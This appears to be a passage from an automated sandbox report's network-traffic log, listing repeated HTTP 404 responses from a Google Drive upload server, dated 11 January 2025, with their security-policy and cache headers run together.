h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41sDb8myeUXrsEiau_XSe-HqAGpRpVND6K19KJgQyGsrl7sLHVDgrsXjFeCFpzdRs4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:01 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-uXGAboKZ8zEMWZ9PLcFzyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgToru8h0awP8tiM2VZerbLzFWseOk7Xp5bMiH61jGOOuExvYFa1fswxOUyYIZtSt3X1xr7Rzz4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:03 GMTContent-Security-Policy: script-src 'nonce-SGZ1vJU3G8e20QrjM0lTJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ2nk-A7of0RxG9ZcrYhDVmQPlq5XwPjucQIcNmHQk9c6ZXVr-1z2N7BJdrgnrZFgLqiQe-0wwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:05 GMTContent-Security-Policy: script-src 'nonce-l-8onPjgFeRex80tzj8cYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6F1Gqhs39DhXemrL3IGwOBftFnWz0tQcSoD41wiFrlttNK0A2QGt_26RY0rNKsMZmzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-Y5FI-lUMHjDm76mBcQGAJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC55pC5XUPdIHCvhIPJJ0lwtQSua15A-UjuFCv8GWn6kk3Kk06RykxMbtXxSmnNT5LYWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:10 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-XxdxbcX2v9B9FMfbYiw6pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC624ajSIfGzut2cDFCCMVIQXkSYMdtQbco-CWxL5CAuDJpnCF-qnbwNFiOL3Dpo89pYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:12 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-50XjqCsO5A_HWlElcgQjKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT4uuRPg2l-5AiBPijV9u2-_M1B_K0sJ0058W5N0wx43cawg7SM_MehnHfClgFBuGbbwDpEBJMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:15 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-egoQtzVXlHtqRHtsB8mn_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQPqmjTMI653FfBuSHtnmV9dS7DUF62QsZBbW9nNns1d9jH811d0OjPRDYY2aW7HqfLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:17 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-7bd134m998viTHqfmd9iKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTGUE6aBXiwHHRZEhZaw0NfkfKO7xp4yRxzRNdcdvEiijTYySwApKRo2-Z4uVLJ3ZpWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-CoCzefY5EMfhb2PjZzv3hQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRFG9Q9dl6SJGxuRrgQBsa7EGMaCZon0g3OkiK6-85QRAwRnP3d35BiHa3n7Ctq2RIHnbKsPDAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:21 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-73FTCfE98bJZgWptiYil2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSeJj-UZZmMvhmYQ_5I1p16qTU-ZAq6xD7CsExD97nCd9ZruTxNCcstnCYpCdZM8BS8_NORw5wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:23 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-MLY6DPlGitZriuOnXQz50w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQiwmoPlvBzeBVuNawBnksVzfkJ3VpCM-c1RDd_Q6IH86o1z6aEttiVsaniFTQnz_bL9z9NQm4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:26 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zaLQfp8jLvZCrcUmhnUmOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC64WyJRqTNhPVdS5N8OifDmaGtIAIYLPKG8bavWbO6JSjCTV0_G1y5h_i_X902_opA9bpdZFiMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:28 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-DiNxNwgG5IstDm4PYtmj3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5gx5tENMxP6y0jGxSnbNEmRc2ioje_Sviwoze7Gqxfo8uw1kc5YoJJuVYKMv-1-YfyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Tp_WFNzdA7p15enucgXJBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTVDUZlxEiF4KLvx33QbxYEfqx60jqKpdT9_mqW-Se3q-nktg5riXV9-HnfSwuJYan2Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:33 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-94ivqguTGv_bpizdqCElcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 